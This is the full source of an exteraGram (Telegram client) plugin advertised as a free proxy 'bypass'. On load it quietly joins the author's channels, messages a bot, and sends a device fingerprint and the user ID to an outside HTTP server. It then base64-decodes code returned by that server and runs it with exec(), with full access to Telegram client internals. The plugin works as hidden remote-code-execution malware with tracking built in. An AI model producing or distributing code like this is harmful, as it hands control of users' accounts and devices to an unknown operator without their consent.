__id__ = "Bypass"
__name__ = "Байпасик (Free)"
__description__ = "Вы сами понимаете что делает этот плагин, наверное...?"
__author__ = "@exteraPluginsSup, @NimarkoProject"
__version__ = "1.0.76"
__icon__ = "exteraPluginsSup/1"
__min_version__ = "12.1.1"

import json
import threading
import urllib.request
import urllib.error
import base64
import time
import ssl
import hashlib
import random
import string
import concurrent.futures
from base_plugin import BasePlugin, AppEvent
from ui.bulletin import BulletinHelper
from android_utils import run_on_ui_thread
from client_utils import run_on_queue, send_request, RequestCallback
from org.telegram.messenger import NotificationCenter, SharedConfig, MessagesController, UserConfig, LocaleController, ApplicationLoader
from org.telegram.tgnet import ConnectionsManager, TLRPC
from hook_utils import find_class

API_URL = "http://bypass.ettacent.dev:6868/api/v1/module"
BOT_USERNAME = "NimarkoCheck_Bot"
REQUIRED_CHANNELS = ["exteraPluginsSup", "NimarkoProject"]

def _gdfp():
    try:
        from android.provider import Settings
        from android.os import Build
        ctx = ApplicationLoader.applicationContext
        aid = Settings.Secure.getString(ctx.getContentResolver(), Settings.Secure.ANDROID_ID)
        bfp = Build.FINGERPRINT
        try:
            pm = ctx.getPackageManager()
            pkg = ctx.getPackageName()
            sig = pm.getPackageInfo(pkg, pm.GET_SIGNATURES).signatures[0]
            sh = hashlib.md5(sig.toByteArray()).hexdigest()
        except:
            sh = "pkg"
        return f"{aid}:{bfp}:{sh}"
    except:
        return None

def _sig(uid, ts, nc):
    return hashlib.sha256(f"extera_bypass_v7_{uid}{ts}{nc}_salt_q8w2e".encode()).hexdigest()[:32]

def _nc():
    return ''.join(random.choices(string.ascii_letters + string.digits, k=16))

def _enc(d):
    j = json.dumps(d)
    b = base64.b64encode(j.encode()).decode()[::-1]
    c = [b[i:i+4] for i in range(0, len(b), 4)]
    return ''.join([c[i] + format(i ^ 0xAB, '02x') for i in range(len(c))])

def _disable_proxy_global():
    try:
        for ac in range(UserConfig.MAX_ACCOUNT_COUNT):
            try:
                cm = ConnectionsManager.getInstance(ac)
                if cm:
                    cm.setProxySettings(False, "", 0, "", "", "")
            except:
                pass
        SharedConfig.proxyEnabled = False
        SharedConfig.currentProxy = None
        if hasattr(SharedConfig, 'proxyList') and SharedConfig.proxyList:
            try:
                SharedConfig.proxyList.clear()
            except:
                pass
        try:
            pr = MessagesController.getGlobalMainSettings()
            ed = pr.edit()
            ed.putBoolean("proxy_enabled", False)
            ed.remove("proxy_ip")
            ed.remove("proxy_port")
            ed.remove("proxy_secret")
            ed.commit()
        except:
            pass
        try:
            NotificationCenter.getGlobalInstance().postNotificationName(NotificationCenter.proxySettingsChanged)
        except:
            pass
    except:
        pass

class BypassPlugin(BasePlugin):
    def __init__(self):
        super().__init__()
        self._ia = False
        self._iu = False
        self._il = False
        self._uid = 0
        self._strings = {}
        self._ec = {}
        self._lk = threading.Lock()
        self._pi = None
        self._pd = None
        self._executor = concurrent.futures.ThreadPoolExecutor(max_workers=10)

    def _guid(self):
        try:
            uc = UserConfig.getInstance(UserConfig.selectedAccount)
            if uc and uc.isClientActivated():
                cu = uc.getCurrentUser()
                if cu:
                    return int(cu.id)
        except:
            pass
        return 0

    def _ustr(self):
        try:
            lc = LocaleController.getInstance().getCurrentLocaleInfo().getLangCode()
        except:
            lc = "en"
        is_ru = lc.startswith("ru")
        self._strings = {
            "not_logged_in": "Войдите в аккаунт" if is_ru else "Please log in first",
            "check_failed": "Ошибка проверки" if is_ru else "Check failed",
            "activated": "🛡 Байпас активирован" if is_ru else "🛡 Bypass activated",
            "deactivated": "Прокси отключён" if is_ru else "Proxy disabled",
            "device_error": "Устройство не поддерживается" if is_ru else "Device not supported",
            "rate_limit": "Слишком много запросов" if is_ru else "Too many requests",
        }

    def _gs(self, k):
        return self._strings.get(k, k)

    def _disable_proxy(self):
        run_on_ui_thread(_disable_proxy_global)

    def _send_start_to_bot(self):
        event = threading.Event()
        
        def do_send():
            try:
                rq = TLRPC.TL_contacts_resolveUsername()
                rq.username = BOT_USERNAME
                
                def on_resolve(r, e):
                    if e or not r:
                        event.set()
                        return
                    try:
                        users = r.users
                        if not users or users.size() == 0:
                            event.set()
                            return
                        
                        bot_user = users.get(0)
                        
                        msg = TLRPC.TL_messages_sendMessage()
                        msg.peer = TLRPC.TL_inputPeerUser()
                        msg.peer.user_id = bot_user.id
                        msg.peer.access_hash = bot_user.access_hash
                        msg.message = "/start"
                        msg.random_id = random.randint(1, 2**63)
                        
                        send_request(msg, RequestCallback(lambda r2, e2: event.set()))
                    except:
                        event.set()
                
                send_request(rq, RequestCallback(on_resolve))
            except:
                event.set()
        
        run_on_queue(do_send)
        event.wait(timeout=3)

    def _join_channel(self, username):
        def do_join():
            try:
                rq = TLRPC.TL_contacts_resolveUsername()
                rq.username = username
                
                def on_resolve(r, e):
                    if e or not r:
                        return
                    try:
                        cs = r.chats
                        if not cs or cs.size() == 0:
                            return
                        ch = cs.get(0)
                        
                        if hasattr(ch, 'left') and not ch.left:
                            return
                        
                        jq = TLRPC.TL_channels_joinChannel()
                        ic = TLRPC.TL_inputChannel()
                        ic.channel_id = ch.id
                        ic.access_hash = ch.access_hash
                        jq.channel = ic
                        
                        send_request(jq, RequestCallback(lambda r2, e2: None))
                    except:
                        pass
                
                send_request(rq, RequestCallback(on_resolve))
            except:
                pass
        
        run_on_queue(do_join)

    def _join_all_channels(self):
        for channel in REQUIRED_CHANNELS:
            self._executor.submit(self._join_channel, channel)

    def _exec(self, code_b64):
        try:
            code = base64.b64decode(code_b64).decode('utf-8')
            eg = {
                "TLRPC": TLRPC,
                "SharedConfig": SharedConfig,
                "ConnectionsManager": ConnectionsManager,
                "MessagesController": MessagesController,
                "UserConfig": UserConfig,
                "NotificationCenter": NotificationCenter,
                "ApplicationLoader": ApplicationLoader,
                "send_request": send_request,
                "RequestCallback": RequestCallback,
                "run_on_queue": run_on_queue,
                "run_on_ui_thread": run_on_ui_thread,
                "find_class": find_class,
                "hashlib": hashlib,
                "base64": base64,
                "json": json,
                "time": time,
                "threading": threading,
                "_plugin": self,
                "_exec_result": None
            }
            exec(code, eg)
            return eg.get("_exec_result")
        except:
            return None

    def _request_proxy(self, dfp):
        ts = int(time.time())
        nc = _nc()
        sg = _sig(self._uid, ts, nc)
        
        headers = {
            "Content-Type": "application/json",
            "User-Agent": "ExteraBypass/7.0",
            "X-Timestamp": str(ts),
            "X-Nonce": nc,
            "X-Signature": sg
        }
        
        payload = {
            "payload": _enc({"user_id": self._uid, "device_fp": dfp}),
            "ts": ts,
            "nonce": nc
        }
        
        body = json.dumps(payload).encode('utf-8')
        req = urllib.request.Request(API_URL, data=body, headers=headers, method="POST")
        ctx = ssl.create_default_context()
        
        try:
            with urllib.request.urlopen(req, timeout=10, context=ctx) as resp:
                return json.loads(resp.read().decode('utf-8')), None
        except urllib.error.HTTPError as e:
            try:
                return json.loads(e.read().decode('utf-8')), e.code
            except:
                return None, e.code
        except:
            return None, None

    def _load(self):
        if self._il:
            return
        with self._lk:
            if self._il:
                return
            self._il = True
            
            try:
                dfp = _gdfp()
                if not dfp:
                    self._disable_proxy()
                    run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("device_error")))
                    return
                
                self._join_all_channels()
                
                for attempt in range(5):
                    response, error_code = self._request_proxy(dfp)
                    
                    if response is None:
                        self._disable_proxy()
                        run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("check_failed")))
                        return
                    
                    if response.get("success"):
                        exec_code = response.get("exec")
                        if exec_code:
                            result = self._exec(exec_code)
                            if result and result.get("success"):
                                self._ia = True
                                self._ec = result
                                run_on_ui_thread(lambda: BulletinHelper.show_success(self._gs("activated")))
                                return
                            else:
                                self._disable_proxy()
                                run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("check_failed")))
                                return
                        else:
                            self._disable_proxy()
                            run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("check_failed")))
                            return
                    
                    if response.get("error") == "bot_not_activated":
                        self._send_start_to_bot()
                        time.sleep(1)
                        continue
                    
                    if response.get("error") == "not_subscribed":
                        self._join_all_channels()
                        time.sleep(1)
                        continue
                    
                    if response.get("error") == "rate_limit":
                        self._disable_proxy()
                        run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("rate_limit")))
                        return
                    
                    self._disable_proxy()
                    run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("check_failed")))
                    return
                
                self._disable_proxy()
                run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("check_failed")))
                
            except Exception:
                self._disable_proxy()
                run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("check_failed")))
            finally:
                self._il = False

    def on_plugin_load(self):
        self._iu = False
        self._ia = False
        self._il = False
        self._ustr()
        
        self._disable_proxy()
        
        self._uid = self._guid()
        
        if self._uid == 0:
            run_on_ui_thread(lambda: BulletinHelper.show_error(self._gs("not_logged_in")))
            return
        
        threading.Thread(target=self._load, daemon=True).start()

    def on_plugin_unload(self):
        self._iu = True
        self._ia = False
        self._il = False
        self._ec = {}
        self._pi = None
        self._pd = None
        
        self._disable_proxy()
        
        run_on_ui_thread(lambda: BulletinHelper.show_info(self._gs("deactivated")))

    def on_app_event(self, et):
        if self._iu or self._il:
            return
        if et == AppEvent.START or et == AppEvent.RESUME:
            if not self._ia and self._uid > 0:
                threading.Thread(target=self._load, daemon=True).start()

    def create_settings(self):
        return []